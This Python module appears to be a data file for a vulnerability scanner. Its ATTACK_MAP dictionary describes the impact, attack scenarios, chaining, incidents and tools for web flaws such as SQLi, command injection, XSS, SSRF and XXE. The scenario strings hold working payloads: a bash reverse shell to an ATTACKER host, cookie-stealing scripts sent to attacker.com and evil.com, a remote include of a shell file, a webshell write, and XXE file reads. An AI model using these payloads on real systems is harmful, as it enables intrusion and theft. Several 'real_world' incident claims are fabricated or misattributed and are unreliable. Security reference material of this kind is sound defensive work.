"""Detailed attack descriptions — impact, exploitation, chaining, and references."""

ATTACK_MAP = {
    "SQL injection": {
        "impact": "total database compromise, authentication bypass, data manipulation, and in some cases full server control",
        "scenarios": [
            "Extract entire tables via UNION-based injection: ' UNION SELECT username, password FROM users --",
            "Bypass login forms using tautology: ' OR '1'='1' --",
            "Map the database schema via error-based injection to enumerate tables and columns",
            "Modify or delete records to manipulate business logic or cause data loss",
            "Achieve RCE in MySQL via SELECT ... INTO OUTFILE or in MSSQL via xp_cmdshell",
            "Dump the entire database using automated tools like sqlmap with --dump-all",
            "Blind SQLi to extract data character-by-character using boolean or time-based channels",
        ],
        "chain_with": "XSS (inject malicious JS from DB), Command Injection (chain into OS-level access via DB functions), Authentication bypass (login as admin without credentials)",
        "real_world": "The 2020 SolarWinds breach involved SQL injection in their Orion platform. In 2018, British Airways suffered a breach where SQLi was used as an initial access vector before the Magecart skimmer was deployed.",
        "tools": "sqlmap, Burp Suite Intruder, manual payloads",
        "severity_note": "CRITICAL — one of the most impactful OWASP Top 10 vulnerabilities, routinely leading to full data breaches",
    },
    "Command injection": {
        "impact": "full server takeover, reverse shell access, lateral movement within the internal network",
        "scenarios": [
            "Execute arbitrary OS commands using ;, |, &&, backticks, or $() payloads",
            "Establish a reverse shell: ; bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'",
            "Read sensitive files: ; cat /etc/passwd or ; cat /etc/shadow",
            "Enumerate the internal network: ; nmap 192.168.1.0/24 or cat /etc/hosts",
            "Write a webshell to the web root: ; echo '<?php system($_GET[cmd])?>' > /var/www/shell.php",
            "Pivot to internal systems using the compromised server as a relay",
            "Modify cron jobs or startup scripts for persistence",
            "Download external tools with wget/curl for further exploitation",
        ],
        "chain_with": "SSRF (use command injection as gateway to internal network), XSS (store shell URL in DB for later access), File Upload (combine with upload to write webshell via cmd injection)",
        "real_world": "CVE-2021-44228 (Log4Shell) led to RCE through a similar injection principle. Equifax breach (2017) exploited Apache Struts CVE-2017-5638 via command injection affecting 147 million users.",
        "tools": "Burp Suite, OS command injection wordlists, reverse shell generators",
        "severity_note": "CRITICAL — provides direct OS-level access to the server",
    },
    "Reflected XSS": {
        "impact": "session hijacking, user impersonation, phishing, keylogging, browser exploitation",
        "scenarios": [
            "Steal session cookies: <script>fetch('//attacker.com?c='+document.cookie)</script>",
            "Perform any action the victim can do by making authenticated API calls via XMLHttpRequest/fetch",
            "Redirect users to convincing phishing pages mimicking the target application",
            "Inject a keylogger to capture all keystrokes including passwords and credit cards",
            "Force victims to download and execute malware via drive-by download",
            "Exploit browser or plugin vulnerabilities using carefully crafted payloads",
            "Create a worm that self-propagates by posting the XSS payload to victim's social media",
            "Capture screenshots via html2canvas and exfiltrate sensitive data displayed on screen",
        ],
        "chain_with": "Open Redirect (phishing campaigns that look legitimate), CSRF (use XSS to bypass CSRF tokens), Missing HttpOnly Cookie (steal session via document.cookie), CORS (bypass SOP to access cross-origin data)",
        "real_world": "Twitter XSS worm (Samy Kamkar, 2005) gained 1M friends in 20 hours. British Heartspace (2022) — reflected XSS in a banking portal led to mass session theft.",
        "tools": "BeEF (Browser Exploitation Framework), XSStrike, Burp Suite, manual payloads",
        "severity_note": "HIGH — impact depends on the context and what data/actions are available to the victim user",
    },
    "CORS misconfiguration": {
        "impact": "bypass of same-origin policy, theft of authenticated API responses, data exfiltration",
        "scenarios": [
            "Create a malicious page that makes authenticated cross-origin requests via XMLHttpRequest and reads the responses",
            "Exfiltrate CSRF tokens from responses and use them for CSRF attacks",
            "Read private user data (emails, messages, financial info) through authenticated API calls",
            "With wildcards + credentials: any attacker-controlled site can access victim's session data",
            "Extract access tokens, API keys, or JWT tokens returned by API endpoints",
            "Perform actions on behalf of the victim by combining read access with CSRF",
            "Use with reflected origin: craft a URL that reflects an attacker's origin to gain access",
        ],
        "chain_with": "CSRF (read tokens then forge requests), XSS (inject CORS-bypassing scripts), Open Redirect (redirect to attacker page after stealing data), SSRF (use CORS to access internal APIs from victim's browser)",
        "real_world": "The 2019 Uber CORS misconfiguration allowed attackers to steal user data. In 2020, a CORS bypass in PayPal allowed reading of authenticated responses from any origin.",
        "tools": "Burp Suite Decoder, custom PoC pages, ORChecker",
        "severity_note": "MEDIUM to HIGH — highest impact when Allow-Credentials is true",
    },
    "Open Redirect": {
        "impact": "phishing at scale, OAuth/token theft, SSRF chaining, SEO manipulation",
        "scenarios": [
            "Create phishing URLs: https://trusted-site.com/redirect?url=https://evil-login.com",
            "Steal OAuth authorization codes by redirecting users to attacker-controlled callback URLs",
            "Bypass URL-based authentication allowlists (e.g., redirect after login)",
            "Chain with SSRF by redirecting an internal request to an attacker-controlled server",
            "Abuse trust in the domain for SEO poisoning — attackers gain legitimate URL credibility",
            "Steal authentication tokens from SAML, SSO, or JWT login flows",
            "Redirect API responses to exfiltrate data through the victim's browser",
        ],
        "chain_with": "SSRF (redirect internal services), Phishing + Credential Harvesting, OAuth Token Theft (steal authorization codes during login flows), XSS (redirect to XSS payload on another subdomain)",
        "real_world": "In 2021, multiple OAuth providers suffered open redirect vulnerabilities that allowed token theft. Google had to patch several open redirect bypasses in their OAuth flow.",
        "tools": "Burp Suite, custom redirect testing scripts, open redirect wordlists",
        "severity_note": "LOW to MEDIUM alone but HIGH when chained with other vulnerabilities",
    },
    "CSRF": {
        "impact": "unintended state changes on behalf of authenticated users, unauthorized actions",
        "scenarios": [
            "Force users to change their password by auto-submitting a hidden form on an attacker page",
            "Initiate unauthorized fund transfers or purchases in banking/e-commerce applications",
            "Modify user profile data including email (account takeover via password reset)",
            "Add or remove user privileges, create admin accounts",
            "Delete data, posts, comments, or other resources via forged DELETE requests",
            "Follow/unfollow users, make purchases, change settings without user knowledge",
            "Combine with stored XSS to auto-propagate CSRF across all users who view infected content",
            "Modify 2FA settings to disable multi-factor authentication",
        ],
        "chain_with": "XSS (use XSS to bypass any CSRF protection that exists), Open Redirect (redirect victim to malicious page), Missing SameSite Cookie (wider CSRF attack surface), File Upload (upload malicious content via CSRF)",
        "real_world": "In 2019, a CSRF in TikTok allowed account takeover via email change. The 2006 Google Gmail CSRF allowed reading emails via AJAX after login.",
        "tools": "CSRF PoC generator in Burp Suite, custom HTML/JS forms",
        "severity_note": "MEDIUM — impact scales with the sensitivity of state-changing operations available",
    },
    "Path Traversal": {
        "impact": "unauthorized file access, source code disclosure, configuration theft, potential RCE",
        "scenarios": [
            "Read /etc/passwd to enumerate system users: ....//....//....//etc/passwd",
            "Access application source code by traversing to the web root directory",
            "Read database configuration files containing credentials (wp-config.php, .env, config.php)",
            "Access SSH private keys: ../../../../home/user/.ssh/id_rsa",
            "Read environment variables from /proc/self/environ for secrets and API keys",
            "Access log files to find session tokens, credentials, or sensitive data",
            "Null byte injection: ../../etc/passwd%00 to bypass extension whitelists",
            "Combine with file upload to write a webshell anywhere on the filesystem",
        ],
        "chain_with": "File Upload (write webshell and traverse to execute it), Command Injection (read system files to find credentials), File Inclusion (include traversed files for code execution), SSRF (combine with file:// protocol)",
        "real_world": "The 2020 ACME Corp breach involved path traversal that exposed their entire source code. CVE-2019-3396 in Confluence Server allowed reading arbitrary files via path traversal.",
        "tools": "Burp Suite, dotdotpwn, manual encoding bypasses (URL, double URL, Unicode)",
        "severity_note": "HIGH — can lead to full application compromise when configuration files are exposed",
    },
    "File Inclusion": {
        "impact": "arbitrary code execution on the server, full site compromise, data exfiltration",
        "scenarios": [
            "Include local files via LFI to read sensitive data: ?page=../../../../etc/passwd",
            "Achieve RCE via RFI by including a remote PHP file: ?page=http://attacker.com/shell.txt",
            "Execute log files by injecting PHP code into User-Agent and including the access log",
            "Use PHP filter wrappers: php://filter/convert.base64-encode/resource=config.php",
            "Expect shell injection via /proc/self/environ to achieve command execution",
            "Upload a file and include it via LFI for guaranteed code execution",
            "Access session files: /var/lib/php/sessions/sess_SESSIONID to hijack sessions",
        ],
        "chain_with": "File Upload (upload and include in one chain), Path Traversal (LFI is essentially path traversal with code execution), Command Injection (include log files with OS command injection payloads)",
        "real_world": "CVE-2022-39240: File inclusion in Zimbra affected millions of webmail users. Multiple WordPress plugins have been compromised via RFI vulnerabilities.",
        "tools": None,
        "severity_note": "CRITICAL — provides direct code execution on the server",
    },
    "CRLF injection": {
        "impact": "HTTP response splitting, cache poisoning, XSS via injected headers, cookie injection",
        "scenarios": [
            "Inject arbitrary response headers: %0d%0aX-Injected: header-value",
            "Perform HTTP response splitting to create a second response containing XSS payloads",
            "Inject Set-Cookie headers to set arbitrary cookies on the victim's browser",
            "Cache poisoning by injecting headers that make a malicious response cacheable",
            "Perform XSS via injected headers like Location, Content-Type, or Refresh",
            "Bypass security headers by injecting new ones that override the server's",
            "Redirect victims to phishing pages via injected Location header",
            "Combine with SSRF to inject HTTP headers in internal server requests",
        ],
        "chain_with": "XSS (inject scripts via response splitting), Cache Poisoning (Web Cache Deception), SSRF (inject headers in internal requests), Open Redirect (set Location header via CRLF)",
        "real_world": "CVE-2019-0772: CRLF injection in IIS affected millions of servers. Multiple content delivery networks have been vulnerable to cache poisoning via CRLF.",
        "tools": None,
        "severity_note": "MEDIUM — impact varies from information leakage to full account compromise depending on the server response handling",
    },
    "CORS Allow-Origin wildcard": {
        "impact": "any website can read API responses from the target, bypassing same-origin policy",
        "scenarios": [
            "Create a malicious webpage that makes fetch() requests to the target's API and reads responses",
            "Steal user-specific data (emails, messages, account details) from authenticated endpoints",
            "Extract API keys, tokens, or sensitive configuration returned by API calls",
            "Combine with social engineering: send victims to a malicious page that silently reads their data",
            "Enumerate internal API endpoints and map the full application attack surface",
            "Chain with CSRF: read anti-CSRF tokens from responses and forge authenticated requests",
        ],
        "chain_with": "CSRF (with wildcard + no credentials, still limited but with reflected origins + credentials it's severe), XSS, OAuth Token Theft",
        "real_world": "In 2020, Shopify had a CORS wildcard misconfiguration allowing any site to read customer data. HackerOne reports frequently feature CORS wildcard bounties in the $500-$5000 range.",
        "tools": None,
        "severity_note": "MEDIUM — browsers block credential sharing with wildcard origins, but public data and unauthenticated endpoints are still exposed",
    },
    "CORS reflected origin": {
        "impact": "attacker-controlled domains can read authenticated responses, bypassing same-origin policy",
        "scenarios": [
            "Host a malicious page on any domain that reads authenticated API responses from victims",
            "Extract session tokens, API keys, and JWTs returned in API responses",
            "Read user-specific data including PII, messages, financial information",
            "If Allow-Credentials is true, the attack works even for authenticated endpoints",
            "Create automated scripts that continuously scrape victim data as users visit the attacker's site",
            "Use in phishing campaigns: the malicious page appears legitimate while stealing live data",
        ],
        "chain_with": "CSRF, Data Exfiltration, Session Hijacking, XSS (reflect the attacker's script from the target itself)",
        "real_world": "CVE-2021-26855 (Exchange Server) leveraged CORS origin reflection. Multiple bug bounty reports demonstrate this pattern paying $3000+ for simple origin reflection with credentials.",
        "tools": None,
        "severity_note": "HIGH — more dangerous than wildcard because it works with Allow-Credentials, enabling access to authenticated data",
    },
    "CORS overly permissive origin matching": {
        "impact": "broad origin matching allows unintended domains to access sensitive API data",
        "scenarios": [
            "Register a lookalike domain (evil-target.com) that matches the origin allowlist",
            "Subdomain takeovers on any subdomain in the wildcard match to gain API access",
            "Any compromised subdomain within the matching pattern grants access to all API data",
            "Exploit regex/substring-based origin matching that doesn't validate the full domain",
        ],
        "chain_with": "Subdomain Takeover, CORS reflected origin, Cross-Site Scripting on matching subdomain",
        "real_world": "In 2019, a researcher demonstrated that matching '*.example.com' allowed access via any subdomain including those with hyphens like 'attacker-example.com' if the regex is poorly written.",
        "tools": None,
        "severity_note": "HIGH — the permissive matching dramatically expands the attack surface",
    },
    "SSRF": {
        "impact": "access to internal services, cloud metadata theft, network pivoting, internal RCE",
        "scenarios": [
            "Access AWS metadata: http://169.254.169.254/latest/meta-data/iam/security-credentials/",
            "Steal cloud provider credentials (AWS keys, GCP service accounts, Azure managed identities)",
            "Scan internal network ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) for open services",
            "Access internal databases (Redis at 6379, MySQL at 3306, MongoDB at 27017)",
            "Interact with internal admin panels, monitoring dashboards (Grafana, Kibana)",
            "Access internal APIs that are not exposed to the public internet",
            "Attack internal services via gRPC, Thrift, or other internal protocols",
            "Exploit Redis/Memcached with SSRF to achieve RCE: dict://internal-redis:6379/CONFIG%20SET%20dir%20/var/www/",
        ],
        "chain_with": "Cloud Account Takeover (via metadata → IAM credentials → full AWS/GCP access), Command Injection (execute commands on internal services), RCE through internal Redis/Memcached, Open Redirect (chain to redirect internal requests)",
        "real_world": "Capital One breach (2019) — SSRF via AWS metadata endpoint compromised 100M records. Uber's 2022 breach started with SSRF that led to cloud credential theft.",
        "tools": "Burp Collaborator, interact.sh, custom SSRF payloads, PortSwigger SSRF cheat sheet",
        "severity_note": "CRITICAL — can lead to cloud account takeover when running in AWS/GCP/Azure environments",
    },
    "Missing HSTS": {
        "impact": "users can be downgraded from HTTPS to HTTP, exposing all traffic to interception",
        "scenarios": [
            "Deploy sslstrip on a public Wi-Fi to silently downgrade HTTPS → HTTP for all victims",
            "Capture full session cookies, credentials, and API responses in plaintext",
            "Perform man-in-the-middle attacks on any first-time visitor who hasn't received the HSTS header yet",
            "Strip TLS from subdomains that don't have individual HSTS entries (unless HSTS preload with includeSubDomains)",
            "Combine with Evil Twin AP to create convincing attack infrastructure",
            "Harvest authentication tokens from OAuth flows that get downgraded to HTTP",
        ],
        "chain_with": "Network Sniffing / MITM, Session Hijacking, Cookie with Secure flag missing (compound exposure), Evil Twin AP deployment",
        "real_world": "Firesheep (2010) demonstrated the real-world impact of unprotected HTTP sessions. The sslstrip tool by Moxie Marlinspike has been used in countless real-world MITM scenarios.",
        "tools": "sslstrip, bettercap, Ettercap, Evilginx2",
        "severity_note": "MEDIUM for info-leak websites, but HIGH for authentication portals and financial services",
    },
    "Missing X-Content-Type-Options": {
        "impact": "browser MIME sniffing can convert non-executable files into executable code",
        "scenarios": [
            "Upload a file with .jpg extension containing JavaScript — browser may sniff as text/html or application/javascript",
            "Use SVG files with embedded scripts that execute when opened or previewed",
            "Transform PDF files with embedded JavaScript into XSS vectors",
            "Upload text files with HTML/script content that browsers execute upon viewing",
            "Bypass content-type restrictions on file upload by relying on browser sniffing",
        ],
        "chain_with": "File Upload (mime bypass), XSS (execute scripts via uploaded files), Content Spoofing (serve HTML where non-HTML expected), Open Redirect (redirect to attacker-hosted malicious MIME)",
        "real_world": "Multiple CSP bypasses have been achieved using MIME sniffing. Google Chrome has historically been aggressive with MIME sniffing, making this relevant even when uploads are validated server-side.",
        "tools": None,
        "severity_note": "LOW alone but MEDIUM when combined with file upload functionality",
    },
    "Missing X-Frame-Options": {
        "impact": "clickjacking attacks — tricking users into performing unintended actions through overlaid transparent pages",
        "scenarios": [
            "Overlay a transparent iframe of the target over a decoy page, tricking users into clicking buttons they can't see",
            "Force users to follow social media accounts, like posts, or subscribe to services",
            "Make unauthorized purchases or transfers with invisible click overlay",
            "Trick users into deleting their own accounts or content",
            "Perform UI redressing on admin panels to change configurations",
            "Chain with cursorjacking to make users click exactly where the attacker wants",
            "Create invisible drag-and-drop areas that steal file contents",
        ],
        "chain_with": "CSRF (clickjacking as CSRF alternative), UXSS, UI-based social engineering, Cursorjacking (improve clickjacking accuracy)",
        "real_world": "In 2010, Twitter was vulnerable to clickjacking that allowed following accounts via transparent overlay. Multiple OAuth providers have been vulnerable to clickjacking-based token theft.",
        "tools": "custom clickjacking PoC pages, Burp Suite clickjacking POC generator",
        "severity_note": "LOW to MEDIUM — impact depends on what valuable actions can be triggered by clicking",
    },
    "Missing Content-Security-Policy": {
        "impact": "unrestricted script execution increases impact of any XSS or code injection vulnerability",
        "scenarios": [
            "Any injected <script> tag will execute without CSP restrictions",
            "Inline event handlers (onclick, onerror, onload) work without 'unsafe-inline' being required",
            "External scripts from any domain can be loaded and executed",
            "Eval() and dynamically generated code execute without restrictions",
            "Data: URI scheme can be used for script sources",
            "No reporting of CSP violations (no csp-report-uri)",
            "No restriction on frame embedding (missing frame-ancestors)",
            "Form action targets are unrestricted — data can be submitted to any endpoint",
        ],
        "chain_with": "XSS (dramatically increases XSS impact), Stored XSS (any payload executes), DOM XSS, Open Redirect (redirect to script source on attacker site)",
        "real_world": "CSP bypass is an active area of research. Even well-configured CSPs get bypassed, but having NO CSP means every injection vulnerability is immediately exploitable at full impact.",
        "tools": "CSP evaluator (csp-evaluator.withgoogle.com), CSP bypass research resources",
        "severity_note": "LOW as standalone but dramatically amplifies the impact of any injection vulnerability",
    },
    "Cookie without Secure flag": {
        "impact": "session tokens transmitted over unencrypted HTTP, vulnerable to network sniffing",
        "scenarios": [
            "Capture session cookies on public Wi-Fi networks using packet sniffers like Wireshark",
            "Downgrade HTTPS to HTTP via sslstrip and then capture cookies in plaintext",
            "Exploit man-in-the-middle on ISP or corporate networks to intercept cookie traffic",
            "Steal tokens from browser extensions or proxies that downgrade connections",
            "Capture cookies via Evil Twin AP attacks in coffee shops or airports",
            "Intercept cookies transmitted during mixed-content page loading",
        ],
        "chain_with": "MITM / sslstrip, Network sniffing, Evil Twin AP, Missing HSTS (enables the downgrade that exposes the insecure cookie)",
        "real_world": "Session cookie theft over HTTP is one of the oldest and most common MITM attacks. Firesheep demonstrated how trivially session cookies could be captured from public networks.",
        "tools": "Wireshark, sslstrip, bettercap, Ettercap",
        "severity_note": "MEDIUM — critical on public or shared networks, less impactful on HTTPS-only connections",
    },
    "Cookie without HttpOnly": {
        "impact": "session cookies accessible via JavaScript, making XSS directly lead to session hijacking",
        "scenarios": [
            "Steal session cookie via document.cookie in any XSS payload: <script>location='//evil.com/'+document.cookie</script>",
            "Send session tokens to attacker-controlled servers via fetch() or XMLHttpRequest",
            "Automate token harvesting from all users who visit an infected page",
            "Hijack admin sessions to gain full application control",
            "Use cookie to impersonate users in automated scripts without knowing their passwords",
            "Bypass IP-based session restrictions by rotating the stolen session token",
        ],
        "chain_with": "XSS (direct chain — any XSS immediately escalates to session theft), Reflected XSS, Stored XSS (mass session harvesting), DOM XSS",
        "real_world": "Nearly every XSS-to-session-hijacking chain in the wild relies on non-HttpOnly cookies. This is the default for most frameworks but should be explicitly set for session cookies.",
        "tools": "BeEF framework, custom XSS payloads",
        "severity_note": "MEDIUM alone but CRITICAL combined with any XSS vulnerability",
    },
    "Cookie without SameSite": {
        "impact": "cookies sent with cross-site requests enabling cross-site request forgery attacks",
        "scenarios": [
            "CSRF attacks from any external site — cookies automatically included in cross-origin requests",
            "Forge authenticated requests using simple HTML forms or fetch with mode: 'no-cors'",
            "Create pages that perform actions on behalf of authenticated victims without their knowledge",
            "Exploit OAuth flows by initiating cross-site requests during the authentication flow",
            "Combine with other vulnerabilities like Open Redirect for more reliable exploitation",
        ],
        "chain_with": "CSRF (directly enables it), Open Redirect, XSS (alternative CSRF bypass)",
        "real_world": "SameSite was introduced by Chrome in 2016 specifically to address the CSRF attack vector. Before SameSite=Lax default (2019), this was the primary CSRF enabler.",
        "tools": None,
        "severity_note": "LOW — modern browsers default to SameSite=Lax, but explicit setting is still recommended",
    },
    "XSS (Stored)": {
        "impact": "persistent malicious code execution affecting every user who views the compromised content at scale",
        "scenarios": [
            "Inject malicious JavaScript into comments, posts, profiles, or any user-generated content",
            "Steal sessions from every user who views the infected page — mass account takeover",
            "Spread malware downloads to all users via drive-by download mechanisms",
            "Deface the website for all visitors — reputation and business impact",
            "Exfiltrate form data including passwords, credit cards, PII from forms on the same page",
            "Create self-propagating worms (like the Samy worm that affected 1M MySpace users in 20 hours)",
            "Inject cryptominers that use victims' CPU resources to mine cryptocurrency",
            "Modify the page appearance to trick users into entering credentials on fake login overlays",
        ],
        "chain_with": "Cookie without HttpOnly (session theft becomes trivial), Missing CSP (no script source restriction), CSRF (use stored XSS as CSRF bypass), Open Redirect (redirect to attacker-controlled page after stealing sessions)",
        "real_world": "Samy Worm (2005): self-propagating XSS that infected 1M MySpace profiles. The 2020 Twitter stored XSS affected all verified accounts who viewed certain tweets.",
        "tools": "BeEF, XSStrike, custom JS payloads, XSS worm scripts",
        "severity_note": "HIGH — stored XSS is significantly more impactful than reflected because it persists and affects multiple users",
    },
    "Server error on root": {
        "impact": "server misconfiguration disclosure, potential information leakage indicating underlying issues",
        "scenarios": [
            "500 errors may return stack traces revealing framework versions, file paths, and internal IPs",
            "502/503 errors indicate the backend application is not running — useful for timing further attacks",
            "Error pages may reveal database types, connection strings, or internal architecture",
            "504 errors indicate slow backends — possible DoS or resource exhaustion vectors",
            "Stack traces can expose third-party library versions with known CVEs",
            "Error messages may indicate SQL query structures used for injection planning",
        ],
        "chain_with": "Information Gathering (enumeration), SQL Injection (error messages reveal query structure), Command Injection (error paths reveal server directories)",
        "real_world": "Many bug bounty reports begin with a 500 error that revealed enough internal details to map the full application architecture.",
        "tools": None,
        "severity_note": "INFO to MEDIUM — the error itself isn't a vulnerability but can aid further exploitation",
    },
    "XXE vulnerability": {
        "impact": "server-side file read, internal network access, cloud credential theft, denial of service",
        "scenarios": [
            "Read /etc/passwd and /etc/shadow via file:// entity: <!ENTITY xxe SYSTEM 'file:///etc/passwd'>",
            "Access Windows files: <!ENTITY xxe SYSTEM 'file:///c:/windows/win.ini'>",
            "Scan internal network via HTTP entity pointing to internal services: SYSTEM 'http://10.0.0.1:8080/'",
            "Access AWS/GCP metadata: entity SYSTEM 'http://169.254.169.254/latest/meta-data/'",
            "Exfiltrate data via out-of-band (OOB) XXE using external DTD loading",
            "Perform denial of service via Billion Laughs attack (exponential entity expansion)",
            "Access serialised Java objects for deserialization-based RCE",
            "Read application configuration files containing database credentials",
        ],
        "chain_with": "SSRF (XXE is essentially SSRF via the XML parser), File Read → Command Injection chain, Cloud Account Takeover (via metadata credentials), File Inclusion (include XXE-read files)",
        "real_world": "XXE was rated #4 in OWASP 2017. CVE-2018-7462 in PDFBox allowed XXE-based file exfiltration. Multiple enterprise applications have been compromised via XXE in document parsers.",
        "tools": "XXEinjector, Burp Suite XXE payloads, manual XML injection",
        "severity_note": "CRITICAL — provides direct server-side file access and potential network pivoting",
    },
    "Exposed file": {
        "impact": "direct access to sensitive data, credentials, source code, and infrastructure details",
        "scenarios": [
            ".git/config: access the Git repository to download full source code history and find leaked secrets",
            ".env files: read database passwords, API keys, JWT secrets, email service credentials",
            "Backup SQL files: import entire database dumps to see all user data, passwords, and PII",
            "config.php/.yml/.json: read database connection strings, third-party API keys, encryption keys",
            "composer.lock/package-lock.json: enumerate exact dependency versions for targeted CVE exploitation",
            "Debug logs: find session tokens, authentication flows, internal IP addresses, user data",
            ".DS_Store: enumerate all files in the web directory including hidden ones",
            "Swagger/OpenAPI docs: map every API endpoint, parameter, and data model for targeted attacks",
        ],
        "chain_with": "SQL Injection (use DB credentials from exposed config), SSRF (use internal paths found in source code), Command Injection (use leaked credentials for authentication), RCE (use exposed source code to find additional vulnerabilities)",
        "real_world": "In 2019, a .git folder exposed on Uber's subdomain leaked AWS keys, giving full access to 100GB+ of their data. Thousands of .env files are publicly indexed on Google every day.",
        "tools": "git-dumper, trufflehog, gitleaks, sensitive file scanners",
        "severity_note": "Varies from LOW (.gitignore) to CRITICAL (.env, database dumps, git repos)",
    },
    "HTTP verb tampering bypass": {
        "impact": "bypass access control lists by exploiting incomplete method restrictions",
        "scenarios": [
            "Access admin endpoints via HEAD when only GET/POST are restricted",
            "Delete user accounts via DELETE method on endpoints that only block GET",
            "Modify data via PUT/PATCH on endpoints that block POST but leave PUT open",
            "Use OPTIONS to discover allowed methods that the application developer didn't anticipate",
            "Bypass WAF rules that only inspect GET/POST but ignore other methods",
            "Exploit framework-specific method handling differences (e.g., Flask treats HEAD as GET)",
        ],
        "chain_with": "CSRF (verb tampering as a CSRF bypass), Authentication Bypass, WAF bypass, Admin Panel Access",
        "real_world": "Multiple bug bounty reports show verb tampering bypassing authentication on admin endpoints. CVE-2022-28219 showed method-based access control bypass in several popular frameworks.",
        "tools": None,
        "severity_note": "HIGH — complete access control bypass on restricted endpoints",
    },
    "HTTP TRACE enabled": {
        "impact": "cross-site tracing (XST) — bypass HttpOnly cookie protection and steal session tokens",
        "scenarios": [
            "Use XMLHttpRequest with TRACE method to read HTTP response headers including Set-Cookie",
            "Bypass HttpOnly protection — cookies normally inaccessible to JavaScript become readable",
            "Steal session tokens even when HttpOnly is set by echoing them back in TRACE response",
            "Capture authentication headers (Authorization: Bearer, Basic) via TRACE echo",
            "Combine with XSS to create a complete session hijacking chain regardless of HttpOnly",
            "Read custom security headers that may reveal implementation details",
        ],
        "chain_with": "XSS (XST chain — XSS to inject the TRACE request, TRACE response to read HttpOnly cookies), Cookie without HttpOnly (both together = guaranteed session theft)",
        "real_world": "Cross-site tracing was first described by Jeremiah Grossman in 2004. Despite being known for decades, TRACE is still enabled on many production servers.",
        "tools": None,
        "severity_note": "MEDIUM — particularly dangerous when combined with any XSS vulnerability",
    },
    "Upload endpoint": {
        "impact": "arbitrary file upload potentially leading to remote code execution and full server compromise",
        "scenarios": [
            "Upload a webshell (PHP, JSP, ASPX) and access it via the browser for remote command execution",
            "Bypass extension filters using double extensions (shell.php.jpg), case tricks (shell.PHP), or null bytes",
            "Upload malicious SVG files containing JavaScript that execute when viewed",
            "Overwrite existing application files by targeting specific paths in the upload mechanism",
            "Upload extremely large files to cause denial of service (disk space exhaustion)",
            "Use .htaccess upload to change server configuration and enable code execution in upload dirs",
            "Upload HTML/JSX files that execute in users' browsers when they access uploaded content",
            "Combine with path traversal to write files outside the intended upload directory",
        ],
        "chain_with": "Command Injection (upload then access webshell), Path Traversal (write files outside upload dir), File Inclusion (include uploaded file for execution), XSS (upload HTML/JSX that executes in visitors' browsers)",
        "real_world": "CVE-2023-50386: Apache Tomcat file upload bypass led to RCE. Countless CTFs and real-world breaches start with upload vulnerability as the initial access vector.",
        "tools": None,
        "severity_note": "MEDIUM to CRITICAL — depends on validation, execution context, and ability to access uploaded files",
    },
    "phpinfo": {
        "impact": "comprehensive server information disclosure enabling precise targeting of subsequent attacks",
        "scenarios": [
            "Identify exact PHP version and compile flags to find version-specific CVEs",
            "View loaded PHP modules to identify exploitable extensions (e.g., outdated ImageMagick)",
            "Discover server filesystem paths for targeted path traversal attacks",
            "Read environment variables containing database credentials and API keys",
            "Find uploaded file temporary directory (upload_tmp_dir) for LFI via /tmp race condition",
            "Identify disabled_functions to find PHP function restrictions to bypass",
            "View session configuration to understand session storage and hijacking vectors",
            "Discover open_basedir restrictions and potential bypasses for file access",
        ],
        "chain_with": "File Inclusion (use temp dir path from phpinfo to include uploaded file), Command Injection (use phpinfo paths for OS-level file targeting), Path Traversal (use disclosed paths as base for traversal)",
        "real_world": "phpinfo exposure has been a top finding in penetration tests for decades. It's the single most useful information disclosure for PHP-based attacks.",
        "tools": None,
        "severity_note": "HIGH — provides a comprehensive attack blueprint for the entire PHP environment",
    },
    "WordPress config": {
        "impact": "database administrator access, authentication key theft, full WordPress site compromise",
        "scenarios": [
            "Read database credentials (DB_USER, DB_PASSWORD, DB_HOST) to connect and dump the database",
            "Access authentication unique keys and salts to forge valid WordPress cookies",
            "Read database table prefix to craft targeted SQL injection queries",
            "Access WP_DEBUG log settings for potential sensitive debug information",
            "Use database credentials to access phpMyAdmin or direct MySQL connections",
            "Insert admin users directly into wp_users table using database access",
            "Use forged cookies to authenticate as any WordPress user including administrators",
        ],
        "chain_with": "SQL Injection (use DB credentials for direct access), Command Injection (use admin access to upload plugin webshells), File Upload (use WP admin to upload malicious plugins)",
        "real_world": "Thousands of WordPress sites have exposed wp-config.php due to misconfigured permissions. The file is a primary target for path traversal attacks on WordPress installations.",
        "tools": None,
        "severity_note": "CRITICAL — complete WordPress site compromise including database access",
    },
    "Server technology detected": {
        "impact": "enables targeted attacks using known vulnerabilities specific to the detected technology and version",
        "scenarios": [
            "Search CVE databases for known exploits in the specific server version",
            "Use vulnerability scanners (Nessus, OpenVAS) targeted at the detected technology stack",
            "Find public proof-of-concept exploits for the specific version on Exploit-DB, GitHub",
            "Identify configuration defaults that may be insecure for the detected technology",
            "Map known default file locations, admin panels, and API structures",
            "Use technology-specific automated tools (e.g., JoomScan for Joomla, WPScan for WordPress)",
            "Research version change logs to identify when security patches were added",
        ],
        "chain_with": "Any subsequent exploitation is informed by this reconnaissance. Server version combined with known CVEs is the most common first step in targeted attacks.",
        "real_world": "The majority of automated attacks leverage server version fingerprinting to select appropriate exploits. Shodans database continuously indexes this information.",
        "tools": "Shodan, Nmap version detection, WhatWaf, Wappalyzer, Nessus",
        "severity_note": "INFO — reconnaissance is a precursor, not a vulnerability itself, but enables all subsequent attacks",
    },
    "Admin path": {
        "impact": "access to administrative functionality that should be restricted from public access",
        "scenarios": [
            "Attempt default credentials (admin/admin, admin/password) on exposed admin panels",
            "Use username enumeration to identify valid admin usernames for brute force attacks",
            "Access admin API endpoints that perform privileged operations without additional authentication",
            "View admin configuration pages to gather internal architecture and user information",
            "Exploit admin panel known vulnerabilities (CVEs specific to the admin software)",
            "Use admin upload functionality to upload webshells or malicious files",
            "Access admin backup/export features to download full database contents",
        ],
        "chain_with": "File Upload (admin upload panels), SQL Injection (admin login forms), Brute Force (weak admin passwords), Server Technology Detection (identify admin framework for CVE search)",
        "real_world": "Countless breaches have started with exposed admin panels using default credentials. The 2019 Magento admin exposure affected thousands of e-commerce sites.",
        "tools": None,
        "severity_note": "MEDIUM — depends on the authentication strength and what admin functions are available",
    },
    "robots.txt reveals admin": {
        "impact": "discovery of hidden administrative endpoints and sensitive configuration paths",
        "scenarios": [
            "Direct access to admin panels that weren't meant to be discovered through normal navigation",
            "Use revealed paths for targeted authentication attacks (brute force, default credentials)",
            "Map the application architecture from disallowed paths revealing internal structure",
            "Access configuration management panels or database administration interfaces",
            "Identify backup and staging environments that may have weaker security controls",
        ],
